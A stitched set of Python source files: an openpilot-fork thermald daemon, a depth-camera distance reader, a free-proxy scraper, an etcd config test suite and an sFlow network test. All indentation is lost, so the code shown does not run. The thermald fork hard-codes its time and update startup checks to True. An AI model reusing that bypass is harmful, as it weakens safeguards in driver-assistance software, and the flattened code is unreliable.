"""Handles non critical hardware state, and sends over queue"""
count = 0
registered_count = 0
prev_hw_state = None
modem_version = None
modem_nv = None
modem_configured = False
while not end_event.is_set():
# these are expensive calls. update every 10s
if (count % int(10. / DT_TRML)) == 0:
try:
network_type = HARDWARE.get_network_type()
modem_temps = HARDWARE.get_modem_temperatures()
if len(modem_temps) == 0 and prev_hw_state is not None:
modem_temps = prev_hw_state.modem_temps
# Log modem version once
if TICI and ((modem_version is None) or (modem_nv is None)):
modem_version = HARDWARE.get_modem_version() # pylint: disable=assignment-from-none
modem_nv = HARDWARE.get_modem_nv() # pylint: disable=assignment-from-none
if (modem_version is not None) and (modem_nv is not None):
cloudlog.event("modem version", version=modem_version, nv=modem_nv)
hw_state = HardwareState(
network_type=network_type,
network_metered=HARDWARE.get_network_metered(network_type),
network_strength=HARDWARE.get_network_strength(network_type),
network_info=HARDWARE.get_network_info(),
nvme_temps=HARDWARE.get_nvme_temperatures(),
modem_temps=modem_temps,
wifi_address=HARDWARE.get_ip_address(),
)
try:
hw_queue.put_nowait(hw_state)
except queue.Full:
pass
if TICI and (hw_state.network_info is not None) and (hw_state.network_info.get('state', None) == "REGISTERED"):
registered_count += 1
else:
registered_count = 0
if registered_count > 10:
cloudlog.warning(f"Modem stuck in registered state {hw_state.network_info}. nmcli conn up lte")
os.system("nmcli conn up lte")
registered_count = 0
# TODO: remove this once the config is in AGNOS
if not modem_configured and len(HARDWARE.get_sim_info().get('sim_id', '')) > 0:
cloudlog.warning("configuring modem")
HARDWARE.configure_modem()
modem_configured = True
prev_hw_state = hw_state
except Exception:
cloudlog.exception("Error getting hardware state")
count += 1
time.sleep(DT_TRML)
def thermald_thread(end_event, hw_queue):
pm = messaging.PubMaster(['deviceState'])
sm = messaging.SubMaster(["peripheralState", "gpsLocationExternal", "controlsState", "pandaStates"], poll=["pandaStates"])
count = 0
onroad_conditions: Dict[str, bool] = {
"ignition": False,
}
startup_conditions: Dict[str, bool] = {}
startup_conditions_prev: Dict[str, bool] = {}
off_ts = None
started_ts = None
started_seen = False
thermal_status = ThermalStatus.green
usb_power = True
last_hw_state = HardwareState(
network_type=NetworkType.none,
network_metered=False,
network_strength=NetworkStrength.unknown,
network_info=None,
nvme_temps=[],
modem_temps=[],
wifi_address='N/A',
)
current_filter = FirstOrderFilter(0., CURRENT_TAU, DT_TRML)
temp_filter = FirstOrderFilter(0., TEMP_TAU, DT_TRML)
charging_disabled = False
should_start_prev = False
in_car = False
is_uno = False
engaged_prev = False
params = Params()
power_monitor = PowerMonitoring()
HARDWARE.initialize_hardware()
thermal_config = HARDWARE.get_thermal_config()
fan_controller = None
# neokii
restart_triggered_ts = 0.
panda_state_ts = 0. # untill to this line neokii
while not end_event.is_set():
sm.update(PANDA_STATES_TIMEOUT)
pandaStates = sm['pandaStates']
peripheralState = sm['peripheralState']
msg = read_thermal(thermal_config)
# neokii
if sec_since_boot() - restart_triggered_ts < 5.:
onroad_conditions["not_restart_triggered"] = False
else:
onroad_conditions["not_restart_triggered"] = True
if params.get_bool("SoftRestartTriggered"):
params.put_bool("SoftRestartTriggered", False)
restart_triggered_ts = sec_since_boot() # untill to this line neokii
if sm.updated['pandaStates'] and len(pandaStates) > 0:
# Set ignition based on any panda connected
onroad_conditions["ignition"] = any(ps.ignitionLine or ps.ignitionCan for ps in pandaStates if ps.pandaType != log.PandaState.PandaType.unknown)
pandaState = pandaStates[0]
# neokii
if pandaState.pandaType != log.PandaState.PandaType.unknown:
panda_state_ts = sec_since_boot() # untill to this line neokii
in_car = pandaState.harnessStatus != log.PandaState.HarnessStatus.notConnected
usb_power = peripheralState.usbPowerMode != log.PeripheralState.UsbPowerMode.client
# Setup fan handler on first connect to panda
if fan_controller is None and peripheralState.pandaType != log.PandaState.PandaType.unknown:
is_uno = peripheralState.pandaType == log.PandaState.PandaType.uno
if TICI:
fan_controller = TiciFanController()
elif is_uno or PC:
fan_controller = UnoFanController()
else:
fan_controller = EonFanController()
# neokii
else:
if sec_since_boot() - panda_state_ts > 3.:
if onroad_conditions["ignition"]:
cloudlog.error("Lost panda connection while onroad")
onroad_conditions["ignition"] = False # untill to this line neokii
try:
last_hw_state = hw_queue.get_nowait()
except queue.Empty:
pass
msg.deviceState.freeSpacePercent = get_available_percent(default=100.0)
msg.deviceState.memoryUsagePercent = int(round(psutil.virtual_memory().percent))
msg.deviceState.cpuUsagePercent = [int(round(n)) for n in psutil.cpu_percent(percpu=True)]
msg.deviceState.gpuUsagePercent = int(round(HARDWARE.get_gpu_usage_percent()))
msg.deviceState.networkType = last_hw_state.network_type
msg.deviceState.networkMetered = last_hw_state.network_metered
msg.deviceState.networkStrength = last_hw_state.network_strength
if last_hw_state.network_info is not None:
msg.deviceState.networkInfo = last_hw_state.network_info
msg.deviceState.nvmeTempC = last_hw_state.nvme_temps
msg.deviceState.modemTempC = last_hw_state.modem_temps
msg.deviceState.wifiIpAddress = last_hw_state.wifi_address
msg.deviceState.screenBrightnessPercent = HARDWARE.get_screen_brightness()
msg.deviceState.batteryPercent = HARDWARE.get_battery_capacity()
msg.deviceState.batteryStatus = HARDWARE.get_battery_status()
msg.deviceState.batteryCurrent = HARDWARE.get_battery_current()
msg.deviceState.usbOnline = HARDWARE.get_usb_present()
current_filter.update(msg.deviceState.batteryCurrent / 1e6)
max_comp_temp = temp_filter.update(
max(max(msg.deviceState.cpuTempC), msg.deviceState.memoryTempC, max(msg.deviceState.gpuTempC))
)
if fan_controller is not None:
msg.deviceState.fanSpeedPercentDesired = fan_controller.update(max_comp_temp, onroad_conditions["ignition"])
is_offroad_for_5_min = (started_ts is None) and ((not started_seen) or (off_ts is None) or (sec_since_boot() - off_ts > 60 * 5))
if is_offroad_for_5_min and max_comp_temp > OFFROAD_DANGER_TEMP:
# If device is offroad we want to cool down before going onroad
# since going onroad increases load and can make temps go over 107
thermal_status = ThermalStatus.danger
else:
current_band = THERMAL_BANDS[thermal_status]
band_idx = list(THERMAL_BANDS.keys()).index(thermal_status)
if current_band.min_temp is not None and max_comp_temp < current_band.min_temp:
thermal_status = list(THERMAL_BANDS.keys())[band_idx - 1]
elif current_band.max_temp is not None and max_comp_temp > current_band.max_temp:
thermal_status = list(THERMAL_BANDS.keys())[band_idx + 1]
# **** starting logic ****
# Ensure date/time are valid
now = datetime.datetime.utcnow()
startup_conditions["time_valid"] = True #(now.year > 2020) or (now.year == 2020 and now.month >= 10)
set_offroad_alert_if_changed("Offroad_InvalidTime", (not startup_conditions["time_valid"]))
startup_conditions["up_to_date"] = True #params.get("Offroad_ConnectivityNeeded") is None or params.get_bool("DisableUpdates") or params.get_bool("SnoozeUpdate")
startup_conditions["not_uninstalling"] = not params.get_bool("DoUninstall")
startup_conditions["accepted_terms"] = params.get("HasAcceptedTerms") == terms_version
# with 2% left, we killall, otherwise the phone will take a long time to boot
startup_conditions["free_space"] = msg.deviceState.freeSpacePercent > 2
startup_conditions["completed_training"] = params.get("CompletedTrainingVersion") == training_version or \
params.get_bool("Passive")
startup_conditions["not_driver_view"] = not params.get_bool("IsDriverViewEnabled")
startup_conditions["not_taking_snapshot"] = not params.get_bool("IsTakingSnapshot")
# if any CPU gets above 107 or the battery gets above 63, kill all processes
# controls will warn with CPU above 95 or battery above 60
onroad_conditions["device_temp_good"] = thermal_status < ThermalStatus.danger
set_offroad_alert_if_changed("Offroad_TemperatureTooHigh", (not onroad_conditions["device_temp_good"]))
# TODO: this should move to TICI.initialize_hardware, but we currently can't import params there
if TICI:
if not os.path.isfile("/persist/comma/living-in-the-moment"):
if not Path("/data/media").is_mount():
set_offroad_alert_if_changed("Offroad_StorageMissing", True)
else:
# check for bad NVMe
try:
with open("/sys/block/nvme0n1/device/model") as f:
model = f.read().strip()
if not model.startswith("Samsung SSD 980") and params.get("Offroad_BadNvme") is None:
set_offroad_alert_if_changed("Offroad_BadNvme", True)
cloudlog.event("Unsupported NVMe", model=model, error=True)
except Exception:
pass
# Handle offroad/onroad transition
should_start = all(onroad_conditions.values())
if started_ts is None:
should_start = should_start and all(startup_conditions.values())
if should_start != should_start_prev or (count == 0):
params.put_bool("IsOnroad", should_start)
params.put_bool("IsOffroad", not should_start)
params.put_bool("IsEngaged", False)
engaged_prev = False
HARDWARE.set_power_save(not should_start)
if sm.updated['controlsState']:
engaged = sm['controlsState'].enabled
if engaged != engaged_prev:
params.put_bool("IsEngaged", engaged)
engaged_prev = engaged
try:
with open('/dev/kmsg', 'w') as kmsg:
kmsg.write(f"<3>[thermald] engaged: {engaged}\n")
except Exception:
pass
if should_start:
off_ts = None
if started_ts is None:
started_ts = sec_since_boot()
started_seen = True
else:
if onroad_conditions["ignition"] and (startup_conditions != startup_conditions_prev):
cloudlog.event("Startup blocked", startup_conditions=startup_conditions, onroad_conditions=onroad_conditions)
started_ts = None
if off_ts is None:
off_ts = sec_since_boot()
# from bellow line, to control charging disabled
charging_disabled = check_car_battery_voltage(should_start, pandaStates, charging_disabled, msg)
if msg.deviceState.batteryCurrent > 0:
msg.deviceState.batteryStatus = "Discharging"
else:
msg.deviceState.batteryStatus = "Charging"
msg.deviceState.chargingDisabled = charging_disabled #to this line
# Offroad power monitoring
power_monitor.calculate(peripheralState, onroad_conditions["ignition"])
msg.deviceState.offroadPowerUsageUwh = power_monitor.get_power_used()
msg.deviceState.carBatteryCapacityUwh = max(0, power_monitor.get_car_battery_capacity())
current_power_draw = HARDWARE.get_current_power_draw() # pylint: disable=assignment-from-none
if current_power_draw is not None:
statlog.sample("power_draw", current_power_draw)
msg.deviceState.powerDrawW = current_power_draw
else:
msg.deviceState.powerDrawW = 0
# Check if we need to disable charging (handled by boardd)
msg.deviceState.chargingDisabled = power_monitor.should_disable_charging(onroad_conditions["ignition"], in_car, off_ts)
# Check if we need to shut down
if power_monitor.should_shutdown(peripheralState, onroad_conditions["ignition"], in_car, off_ts, started_seen):
cloudlog.warning(f"shutting device down, offroad since {off_ts}")
params.put_bool("DoShutdown", True)
msg.deviceState.chargingError = current_filter.x > 0. and msg.deviceState.batteryPercent < 90 # if current is positive, then battery is being discharged
msg.deviceState.started = started_ts is not None
msg.deviceState.startedMonoTime = int(1e9*(started_ts or 0))
last_ping = params.get("LastAthenaPingTime")
if last_ping is not None:
msg.deviceState.lastAthenaPingTime = int(last_ping)
msg.deviceState.thermalStatus = thermal_status
pm.send("deviceState", msg)
if EON and not is_uno:
print(msg) # for charging disabled
set_offroad_alert_if_changed("Offroad_ChargeDisabled", (not usb_power))
should_start_prev = should_start
startup_conditions_prev = startup_conditions.copy()
# Log to statsd
statlog.gauge("free_space_percent", msg.deviceState.freeSpacePercent)
statlog.gauge("gpu_usage_percent", msg.deviceState.gpuUsagePercent)
statlog.gauge("memory_usage_percent", msg.deviceState.memoryUsagePercent)
for i, usage in enumerate(msg.deviceState.cpuUsagePercent):
statlog.gauge(f"cpu{i}_usage_percent", usage)
for i, temp in enumerate(msg.deviceState.cpuTempC):
statlog.gauge(f"cpu{i}_temperature", temp)
for i, temp in enumerate(msg.deviceState.gpuTempC):
statlog.gauge(f"gpu{i}_temperature", temp)
statlog.gauge("memory_temperature", msg.deviceState.memoryTempC)
statlog.gauge("ambient_temperature", msg.deviceState.ambientTempC)
for i, temp in enumerate(msg.deviceState.pmicTempC):
statlog.gauge(f"pmic{i}_temperature", temp)
for i, temp in enumerate(last_hw_state.nvme_temps):
statlog.gauge(f"nvme_temperature{i}", temp)
for i, temp in enumerate(last_hw_state.modem_temps):
statlog.gauge(f"modem_temperature{i}", temp)
statlog.gauge("fan_speed_percent_desired", msg.deviceState.fanSpeedPercentDesired)
statlog.gauge("screen_brightness_percent", msg.deviceState.screenBrightnessPercent)
# report to server once every 10 minutes
if (count % int(600. / DT_TRML)) == 0:
if EON and started_ts is None and msg.deviceState.memoryUsagePercent > 40:
cloudlog.event("High offroad memory usage", mem=msg.deviceState.memoryUsagePercent)
cloudlog.event("STATUS_PACKET",
count=count,
pandaStates=[strip_deprecated_keys(p.to_dict()) for p in pandaStates],
peripheralState=strip_deprecated_keys(peripheralState.to_dict()),
location=(strip_deprecated_keys(sm["gpsLocationExternal"].to_dict()) if sm.alive["gpsLocationExternal"] else None),
deviceState=strip_deprecated_keys(msg.to_dict()))
count += 1
def main():
hw_queue = queue.Queue(maxsize=1)
end_event = threading.Event()
threads = [
threading.Thread(target=hw_state_thread, args=(end_event, hw_queue)),
threading.Thread(target=thermald_thread, args=(end_event, hw_queue)),
]
for t in threads:
t.start()
try:
while True:
time.sleep(1)
if not all(t.is_alive() for t in threads):
break
finally:
end_event.set()
for t in threads:
t.join()
if __name__ == "__main__":
main()
|
distanceFinder.py
|
from threading import Thread
import cv2
import vision
import pyrealsense2
class DistanceGet:
"""
Class that continuously shows a frame using a dedicated thread.
"""
def __init__(self):
self.frames = None
self.stopped = False
self.x = 0
self.y = 0
self.w = 0
self.h = 0
self.distance = None
self.average = [0] * 5
self.dist_prev = None
def start(self):
Thread(target=self.getDist, args=()).start()
return self
def getDist(self):
while not self.stopped:
if self.x != 0:
depth_frame = self.frames.get_depth_frame()
count = 0
total = 0
distprev = 0
try:
pass
# meaure the distance of every pixel of the blob size on half of its height throughout it's width
for z in range(int(self.w)):
for i in range(int(20)):
dist = depth_frame.get_distance(self.x + z, int(self.y/2) + i)
#print(dist)
if dist == 0.0:
pass
elif distprev == 0:
distprev = dist
elif dist > 1.2 * distprev:
pass
elif dist < 0.8 * distprev:
pass
else:
total += dist
count += 1
distprev = dist
# aritmethic average of all of the measurements
self.distance = (total / count)
print(self.distance)
# print(self.x, self.y, self.w, self.h)
# # print(video_getter.distance)
# # print(video_getter.x, video_getter.y, video_getter.w, video_getter.h)
# if dist < 1.33 * self.dist_prev or dist > 0.67 * self.dist_prev or 0 in self.average:
# self.average.append(dist)
# self.distance = sum(self.average) / len(self.average)
# self.dist_prev = dist
# else:
# print("värdmõõt" + str(dist))
except:
# print("Error in measuring distance from pixel")
pass
def stop(self):
self.stopped = True
|
pool.py
|
"""
Multithreads to get proxies from free websites
"""
from proxy_pool import settings
from proxy_pool.db import Proxy
from proxy_pool.utils import print_log
from queue import Queue
import threading
import requests
import random
import time
import re
# turn off unnecessary warnings
requests.packages.urllib3.disable_warnings()
class ProxyWebsite:
def __init__(self, base_url, pages=range(1,2)):
self.base_url = base_url
self.pages = pages
self.count = -1
def __iter__(self):
return self
def __next__(self):
self.count += 1
if self.count < len(self.pages):
return self.base_url.format(self.pages[self.count])
else:
raise StopIteration
def utils_request(url):
"""
使用代理池的有效代理去爬取更多代理
如果代理池没有有效代理,则用本机的 IP
如果失败,不会删除这个有效代理
因为失败的原因很多,而有效代理很宝贵...
"""
headers = {'User-Agent': random.choice(settings.USER_AGENTS)}
try:
proxy = Proxy.random(max_count=0)
print_log('Using {} to fetch {}...'.format(proxy.value, url))
proxies = {'http': proxy.value}
except IndexError:
proxies = {}
try:
response = requests.get(url, headers=headers, proxies=proxies, timeout=10)
if response.status_code == 200:
return response.text
except requests.exceptions.ProxyError:
pass
except requests.exceptions.ReadTimeout:
pass
except requests.exceptions.ConnectionError:
pass
except requests.exceptions.ChunkedEncodingError:
pass
def init_queue(proxy_websites):
queue = Queue() # unlimited
url_list = []
for proxy_website in proxy_websites:
for url in proxy_website:
url_list.append(url)
random.shuffle(url_list)
for url in url_list:
queue.put(url)
return queue
def proxy_website_crawler(queue):
while True:
# 通过测试的量必须大于池子的SIZE
# 待测和通过测试的proxy总数小于 POOL_MAX_SIZE
# 这样做是避免过度爬取代理网站,使本机 IP 被封杀
if (Proxy.total() < settings.POOL_MAX_SIZE
and len(list(Proxy.filter({'count': 0}))) < settings.POOL_SIZE):
url = queue.get()
html = utils_request(url)
if not html:
continue
html = re.sub(r'<.*?>', ' ', html)
html = re.sub(r'\s+', ' ', html)
values = re.findall(r'(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}).*?(\d{2,5})', html)
for value in values:
value = '{}:{}'.format(value[0], value[1]) # very important formatting
p = Proxy(value=value)
try:
Proxy.get({'value': p.value})
except LookupError:
p.save()
p.status('add')
queue.task_done()
else:
time.sleep(5)
def pool_run():
# proxy_websites = [
# ProxyWebsite('https://seotoolstation.com/free-proxy-list'), # easy
# ProxyWebsite('http://www.xicidaili.com/nn/{}', range(1,3000)),
# ProxyWebsite('http://www.xicidaili.com/nt/{}', range(1,690)),
# ProxyWebsite('http://www.xicidaili.com/wn/{}', range(1,1400)),
# ProxyWebsite('http://www.xicidaili.com/wt/{}', range(1,1800)),
# ProxyWebsite('http://www.66ip.cn/{}.html', ['index.html'] + list(range(1,1339))), # easy
# ProxyWebsite('http://www.ip3366.net/free/?page={}', range(1,7)), # easy
# ProxyWebsite('https://www.kuaidaili.com/free/inha/{}/',range(1,1000)), # easy
# ProxyWebsite('https://www.kuaidaili.com/free/intr/{}/',range(1,1000)), # easy
# ProxyWebsite('http://www.data5u.com/free/{}/index.shtml',['gngn', 'gnpt', 'gwgn', 'gwpt']), # easy
# ProxyWebsite('http://www.data5u.com/'), # easy
# ProxyWebsite('http://www.89ip.cn/index_{}.html',range(1, 2000)), # easy
# ProxyWebsite('http://ip.jiangxianli.com/?page={}',range(1,7)), # easy
# ProxyWebsite('http://www.mimiip.com/gngao/{}',range(1,600)), # easy
# ]
proxy_websites = [
ProxyWebsite('https://seotoolstation.com/free-proxy-list'), # easy
ProxyWebsite('http://www.xicidaili.com/nn/{}', range(1,100)),
ProxyWebsite('http://www.xicidaili.com/nt/{}', range(1,100)),
ProxyWebsite('http://www.xicidaili.com/wn/{}', range(1,100)),
ProxyWebsite('http://www.xicidaili.com/wt/{}', range(1,100)),
ProxyWebsite('http://www.66ip.cn/{}.html', ['index.html'] + list(range(1,100))), # easy
ProxyWebsite('http://www.ip3366.net/free/?page={}', range(1,7)), # easy
ProxyWebsite('https://www.kuaidaili.com/free/inha/{}/',range(1,100)), # easy
ProxyWebsite('https://www.kuaidaili.com/free/intr/{}/',range(1,100)), # easy
ProxyWebsite('http://www.data5u.com/free/{}/index.shtml',['gngn', 'gnpt', 'gwgn', 'gwpt']), # easy
ProxyWebsite('http://www.data5u.com/'), # easy
ProxyWebsite('http://www.89ip.cn/index_{}.html',range(1, 100)), # easy
ProxyWebsite('http://ip.jiangxianli.com/?page={}',range(1,7)), # easy
ProxyWebsite('http://www.mimiip.com/gngao/{}',range(1,100)), # easy
]
while True:
queue = init_queue(proxy_websites)
print_log('{} URLs are ready to bring you proxies...'.format(queue.qsize()))
threads = []
for i in range(settings.POOL_WORKERS):
thread = threading.Thread(target=proxy_website_crawler, args=(queue,))
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
queue.join()
|
conman_etcd_test.py
|
import os
import sys
import time
from collections import defaultdict
from threading import Thread
from conman.conman_etcd import ConManEtcd
from conman.etcd_test_util import (start_local_etcd_server,
kill_local_etcd_server,
set_key,
delete_key)
from functools import partial
from unittest import TestCase
class ConManEtcdTest(TestCase):
@classmethod
def setUpClass(cls):
kill_local_etcd_server()
# Start local etcd server if not running
start_local_etcd_server()
# Add good key
cls.good_dict = dict(a='1', b='Yeah, it works!!!')
@classmethod
def tearDownClass(cls):
try:
kill_local_etcd_server()
except: # noqa
pass
def setUp(self):
self.conman = ConManEtcd()
cli = self.conman.client
delete_key(cli, 'good')
delete_key(cli, 'refresh_test')
set_key(cli, 'good', self.good_dict)
def tearDown(self):
cli = self.conman.client
delete_key(cli, 'good')
delete_key(cli, 'refresh_test')
delete_key(cli, 'watch_test')
cli.close()
def test_initialization(self):
cli = self.conman.client
self.assertEqual('127.0.0.1:2379', cli._url)
def test_add_good_key(self):
self.conman.add_key('good')
expected = self.good_dict
actual = self.conman['good']
self.assertEqual(expected, actual)
def test_add_bad_key(self):
self.assertRaises(Exception, self.conman.add_key, 'no such key')
def test_refresh(self):
self.assertFalse('refresh_test' in self.conman)
# Insert a new key to etcd
set_key(self.conman.client, 'refresh_test', dict(a='1'))
# The new key should still not be visible by conman
self.assertFalse('refresh_test' in self.conman)
# Refresh to get the new key
self.conman.refresh('refresh_test')
# The new key should now be visible by conman
self.assertEqual(dict(a='1'), self.conman['refresh_test'])
# Change the key
set_key(self.conman.client, 'refresh_test', dict(b='3'))
# The previous value should still be visible by conman
self.assertEqual(dict(a='1'), self.conman['refresh_test'])
# Refresh again
self.conman.refresh('refresh_test')
# The new value should now be visible by conman
self.assertEqual(dict(b='3'), self.conman['refresh_test'])
def test_dictionary_access(self):
self.conman.add_key('good')
self.assertEqual(self.good_dict, self.conman['good'])
def test_watch_existing_key(self):
def on_change(change_dict, event):
change_dict[event.key].append((type(event).__name__, event.value))
change_dict = defaultdict(list)
self.assertFalse('watch_test' in self.conman)
# Insert a new key to etcd
self.conman.client.put('watch_test/a', '1')
# The new key should still not be visible by conman
self.assertFalse('watch_test' in self.conman)
# Refresh to get the new key
self.conman.refresh('watch_test')
# The new key should now be visible by conman
self.assertEqual(dict(a='1'), self.conman['watch_test'])
# Set the on_change() callback of conman (normally at construction)
on_change = partial(on_change, change_dict)
self.conman.on_change = on_change
watch_id = None
try:
watch_id = self.conman.watch('watch_test/b')
# Change the key
self.conman.client.put('watch_test/b', '3')
# The previous value should still be visible by conman
self.assertEqual(dict(a='1'), self.conman['watch_test'])
# Wait for the change callback to detect the change
for i in range(3):
if change_dict:
break
time.sleep(1)
expected = {b'watch_test/b': [('PutEvent', b'3')]}
actual = dict(change_dict)
self.assertEqual(expected, actual)
# Refresh again
self.conman.refresh('watch_test')
# The new value should now be visible by conman
self.assertEqual(dict(a='1', b='3'), self.conman['watch_test'])
finally:
if watch_id is not None:
self.conman.cancel(watch_id)
def test_watch_prefix(self):
all_events = []
def read_events_in_thread():
with open(os.devnull, 'w') as f:
sys.stdout = f
sys.stderr = f
events, cancel = self.conman.watch_prefix('watch_prefix_test')
for event in events:
k = event.key.decode()
v = event.value.decode()
s = f'{k}: {v}'
all_events.append(s)
if v == 'stop':
cancel()
t = Thread(target=read_events_in_thread)
t.start()
# Insert a new key to etcd
self.conman.client.put('watch_prefix_test/a', '1')
self.conman.client.put('watch_prefix_test/b', '2')
time.sleep(1)
self.conman.client.put('watch_prefix_test', 'stop')
t.join()
expected = [
'watch_prefix_test/a: 1',
'watch_prefix_test/b: 2',
'watch_prefix_test: stop'
]
self.assertEqual(expected, all_events)
|
sflow_test.py
|
#ptf --test-dir ptftests sflow_test --platform-dir ptftests --platform remote -t "enabled_sflow_interfaces=[u'Ethernet116', u'Ethernet124', u'Ethernet112', u'Ethernet120'];active_collectors=[];dst_port=3;testbed_type='t0';router_mac=u'52:54:00:f7:0c:d0';sflow_ports_file='/tmp/sflow_ports.json';agent_id=u'10.250.0.101'" --relax --debug info --log-file /tmp/TestSflowCollector.test_two_collectors.log --socket-recv-size 16384
#/usr/bin/python /usr/bin/ptf --test-dir ptftests sflow_test --platform-dir ptftests --platform remote -t "enabled_sflow_interfaces=[u'Ethernet116', u'Ethernet124', u'Ethernet112', u'Ethernet120'];active_collectors=['collector1'];dst_port=3;testbed_type='t0';router_mac='52:54:00:f7:0c:d0';sflow_ports_file='/tmp/sflow_ports.json';agent_id=u'10.250.0.101'" --relax --debug info --log-file /tmp/TestSflow.log --socket-recv-size 16384
import ptf
import ptf.packet as scapy
import ptf.dataplane as dataplane
import json
from ptf import config
from ptf.base_tests import BaseTest
import ptf.dataplane as dataplane
from ptf.testutils import *
from ptf.mask import Mask
import ipaddress
from json import loads
import threading
import time
import select
from collections import Counter
import logging
import ast
class SflowTest(BaseTest):
def __init__(self):
BaseTest.__init__(self)
self.test_params = test_params_get()
#--------------------------------------------------------------------------
def setUp(self):
self.dataplane = ptf.dataplane_instance
self.router_mac = self.test_params['router_mac']
self.dst_port = self.test_params['dst_port']
if 'enabled_sflow_interfaces' in self.test_params:
self.enabled_intf = self.test_params['enabled_sflow_interfaces']
self.agent_id = self.test_params['agent_id']
self.active_col = self.test_params['active_collectors']
self.sflow_interfaces = []
self.sflow_ports_file = self.test_params['sflow_ports_file']
if 'polling_int' in self.test_params:
self.poll_tests = True
self.polling_int = self.test_params['polling_int']
else:
self.poll_tests = False
with open(self.sflow_ports_file) as fp:
self.interfaces = json.load(fp)
for port,index in self.interfaces.items():
self.sflow_interfaces.append(index["ptf_indices"])
logging.info("Sflow interfaces under Test : %s" %self.interfaces)
self.collectors=['collector0','collector1']
for param,value in self.test_params.items():
logging.info("%s : %s" %(param,value) )
def tearDown(self):
self.cmd(["supervisorctl", "stop", "arp_responder"])
self.cmd(["killall" , "sflowtool"])
#--------------------------------------------------------------------------
def generate_ArpResponderConfig(self):
config = {}
vlan_ip_prefixes = ['192.168.0.2','192.168.0.3','192.168.0.4']
config['eth%d' %self.dst_port] = ['192.168.0.4']
with open('/tmp/sflow_arpresponder.conf', 'w') as fp:
json.dump(config, fp)
self.cmd(["supervisorctl", "restart", "arp_responder"])
#--------------------------------------------------------------------------
def cmd(self, cmds):
process = subprocess.Popen(cmds,
shell=False,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
return_code = process.returncode
return stdout, stderr, return_code
#--------------------------------------------------------------------------
def read_data(self, collector, sflow_port=['6343']):
"""
Starts sflowtool with the corresponding port and saves the data to file for processing
"""
outfile='/tmp/%s'%collector
with open(outfile , 'w') as f:
process = subprocess.Popen(
['/usr/local/bin/sflowtool','-j','-p'] + sflow_port ,
stdout=f,
stderr=subprocess.STDOUT,
shell = False
)
flow_count = 0
counter_count = 0
port_sample ={}
port_sample[collector]={}
port_sample[collector]['FlowSample'] = {}
port_sample[collector]['CounterSample'] = {}
logging.info("Collector %s starts collecting ......"%collector)
while not self.stop_collector :
continue
process.terminate()
f.close()
with open(outfile , 'r') as sflow_data:
for line in sflow_data:
j = json.dumps(ast.literal_eval(line))
datagram = json.loads(j)
agent= datagram["agent"]
samples = datagram["samples"]
for sample in samples:
sampleType = sample["sampleType"]
if sampleType == "FLOWSAMPLE":
flow_count+=1
port_sample[collector]['FlowSample'][flow_count] = sample
elif sampleType == "COUNTERSSAMPLE":
counter_count+=1
port_sample[collector]['CounterSample'][counter_count] = sample
port_sample[collector]['CounterSample'][counter_count]['agent_id'] = agent
sflow_data.close()
port_sample[collector]['counter_count'] = counter_count
port_sample[collector]['flow_count'] = flow_count
port_sample[collector]['total_count'] = counter_count + flow_count
logging.info( "%s Sampled Packets : Total flow samples -> %s Total counter samples -> %s" %(collector,flow_count,counter_count))
return(port_sample)
#--------------------------------------------------------------------------
def collector_0(self):
collector='collector0'
self.collector0_samples=self.read_data('collector0')
#--------------------------------------------------------------------------
def collector_1(self):
collector = 'collector1'
self.collector1_samples=count=self.read_data('collector1',['6344'])
#--------------------------------------------------------------------------
def packet_analyzer(self, port_sample, collector, poll_test):
logging.info("Analysing collector %s"%collector)
data= {}
data['total_samples'] = 0
data['total_flow_count'] = port_sample[collector]['flow_count']
data['total_counter_count'] = port_sample[collector]['counter_count']
data['total_samples'] = port_sample[collector]['flow_count'] + port_sample[collector]['counter_count']
logging.info(data)
if data['total_flow_count']:
data['flow_port_count'] = Counter(k['inputPort'] for k in port_sample[collector]['FlowSample'].values())
if collector not in self.active_col:
logging.info("....%s : Sample Packets are not expected , received %s flow packets and %s counter packets"%(collector,data['total_flow_count'],data['total_counter_count']))
self.assertTrue(data['total_samples'] == 0 ,
"Packets are not expected from %s , but received %s flow packets and %s counter packets" %(collector,data['total_flow_count'],data['total_counter_count']))
else:
if poll_test:
if self.polling_int == 0:
logging.info("....Polling is disabled , Number of counter samples collected %s"%data['total_counter_count'])
self.assertTrue(data['total_counter_count'] == 0,
"Received %s counter packets when polling is disabled in %s"%(data['total_counter_count'],collector))
else:
logging.info("..Analyzing polling test counter packets")
self.assertTrue(data['total_samples'] != 0 ,
"....Packets are not received in active collector ,%s"%collector)
self.analyze_counter_sample(data,collector,self.polling_int,port_sample)
else:
logging.info("Analyzing flow samples in collector %s"%collector)
self.assertTrue(data['total_samples'] != 0 ,
"....Packets are not received in active collector ,%s"%collector)
self.analyze_flow_sample(data,collector)
return data
#--------------------------------------------------------------------------
def analyze_counter_sample(self, data, collector, polling_int, port_sample):
counter_sample = {}
for intf in self.interfaces.keys():
counter_sample[intf] = 0
self.assertTrue(data['total_counter_count'] >0, "No counter packets are received in collector %s"%collector)
for i in range(1,data['total_counter_count']+1):
rcvd_agent_id = port_sample[collector]['CounterSample'][i]['agent_id']
self.assertTrue(rcvd_agent_id == self.agent_id , "Agent id in Sampled packet is not expected . Expected : %s , received : %s"%(self.agent_id,rcvd_agent_id))
elements = port_sample[collector]['CounterSample'][i]['elements']
for element in elements:
try:
if 'ifName' in element and element['ifName'] in self.interfaces.keys():
intf = element['ifName']
counter_sample[intf] +=1
except KeyError:
pass
logging.info("....%s : Counter samples collected for Individual ports = %s" %(collector,counter_sample))
for port in counter_sample:
# checking for max 2 samples instead of 1 considering initial time delay before tests as the counter sampling is random and non-deterministic over period of polling time
self.assertTrue(1 <= counter_sample[port] <= 2," %s counter sample packets are collected in %s seconds of polling interval in port %s instead of 1 or 2 "%(counter_sample[port],self.polling_int,port))
#---------------------------------------------------------------------------
def analyze_flow_sample(self, data, collector):
logging.info("packets collected from interfaces ifindex : %s" %data['flow_port_count'])
logging.info("Expected number of packets from each port : %s to %s" % (100 * 0.6, 100 * 1.4))
for port in self.interfaces:
index = self.interfaces[port]['port_index'] ##NOTE: hsflowd is sending index instead of ifindex.
logging.info("....%s : Flow packets collected from port %s = %s"%(collector,port,data['flow_port_count'][index]))
if port in self.enabled_intf :
# Checking samples with tolerance of 40 % as the sampling is random and not deterministic.Over many samples it should converge to a mean of 1:N
# Number of packets sent = 100 * sampling rate of interface
self.assertTrue(100 * 0.6 <= data['flow_port_count'][index] <= 100 * 1.4 ,
